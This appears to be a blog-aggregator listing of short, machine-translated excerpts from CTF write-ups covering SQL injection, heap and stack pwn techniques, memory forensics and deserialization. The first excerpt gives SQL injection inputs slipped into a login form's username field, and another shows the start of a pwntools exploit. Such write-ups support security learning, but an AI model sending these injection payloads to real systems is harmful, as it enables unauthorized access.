BUUOJ question brushing record 9-16

[geek challenge 2019]LoveSQL ​ Try the universal password first and go straight in Then try ?username=1' order by 3#&password=1 ​ But I couldn't do it anyway. Later, I found that it was because the # number couldn't be transmitted, so I changed it to% 23 (# url code) Then try username=1' order by 3%23&password=1 username=1' order b ...

Posted by haolan on Thu, 27 Jan 2022 09:12:25 +0100

GKCTF X DASCTF emergency Challenge Cup - Maple_root-Writeup

Some title WP contains pictures, because CSDN can't get external pictures, so it can't join. If you want to watch the full version, welcome Click here to access Another: CSDN inserting the outer chain picture failed again and again. It's really disgusting. We're already considering transferring stations Participants: b4tteRy, x0r, f1oat ...

Posted by jehardesty on Tue, 25 Jan 2022 19:40:22 +0100

IO_FILE-FSOP,house of orange

FSOP is the abbreviation of File Stream Oriented Programming. All_ IO_ The file structure is_ The chain field is connected to form a linked list_ IO_list_all to maintain. The core idea of FSOP is hijacking_ IO_list_all to forge the linked list and its_ IO_FILE entry. In addition to forging data, another point is to find a way to execute. FSOP s ...

Posted by purplehaze on Wed, 19 Jan 2022 21:24:46 +0100

[ctf misc][wp] wp of some memory Forensics (including the Bo People's files of [2021 Blue Hat Cup North Division]

wp 1. [v & n2020 open] memory Forensics 1. Find strategies volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2. Look at the process volatility.exe -f C:\Users\shen\Downloads\mem.raw --profile=Win7SP1x86_23418 pslist > pslist.txt From the back to the front, the last one is for fixing the memory image dumpit Software and ...

Posted by Duell on Mon, 17 Jan 2022 00:52:46 +0100

[ctf wiki pwn] stackoverflow: ret2dlresolve Series 1 (_dl_runtime_resolve glibc source code analysis and practice)

1 _dl_runtime_resolve entry _ dl_runtime_resolve is implemented by assembly in glibc, in which the 32-bit entry point is / sysdeps / i386 / dl trampoline S. 64 bit entry point in / sysps_ 64/dl-trampoline. S. This paper mainly analyzes the 32-bit source code, version 2.23. From glibc online source website https://elixir.bootlin.com/glibc/ ...

Posted by tnkannan on Sun, 16 Jan 2022 00:33:45 +0100

CTF pwn direction partial problem solution

dataleak Two \ x00 can be skipped with "\ or / but each time" \ is used, 4 bytes will be copied to buf, so the last 3 bytes of data cannot be leaked. Therefore, / \ is used to control the leaked string with garbage data filling. exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = l ...

Posted by jasongr on Wed, 12 Jan 2022 12:09:40 +0100

Nucleus -- a fast vulnerability scanning tool based on YAML syntax template

1, Tool introduction 1. Introduction Nucleus is a customized rapid vulnerability scanner based on YAML syntax template. It is developed with Go language and has strong configurability, scalability and ease of use. At present, the project has 6.6k stars on Github. Official website: https://nuclei.projectdiscovery.ioNucleoi project addres ...

Posted by leeperryar on Sun, 09 Jan 2022 10:31:51 +0100

Ctfshowmisc (file structure)

Just write, take notes MISC24-25 Change the picture height to see the flag MISC26 The title suggests that the flag is under the picture, but how many are there? Change the height to 900 and you can see half of the flag: Here we also need to find out the real height of this picture and see the script of the boss on the Internet: import b ...

Posted by nyk on Sun, 02 Jan 2022 22:06:34 +0100

One day, weekly CTF several deserialization exercises

Just talk but not practice the fake style. Use the CTF topic as an after-school exercise to test whether we master it. This is the first two of the four deserialized questions of weekly CTF one day (exhausted, rest and do the latter two) EZ-unserialize It's no exaggeration to say that I did it for a long time. It's a common question type, but b ...

Posted by radar on Sun, 02 Jan 2022 08:51:57 +0100

2021DASCTF actual combat elite summer camp and DASCTF July X CBCTF old_thing

RELRO half open. After you come in, you need to log in first. The user name is admin, but the password is unknown. Given a reverse, after research is md5 Why md5? First, let's take a look at what md5 is. First of all, no matter how long the input is, the output md5 value must be 16 bytes. Also know that md5 there is something called standa ...

Posted by fishown on Mon, 27 Dec 2021 10:30:35 +0100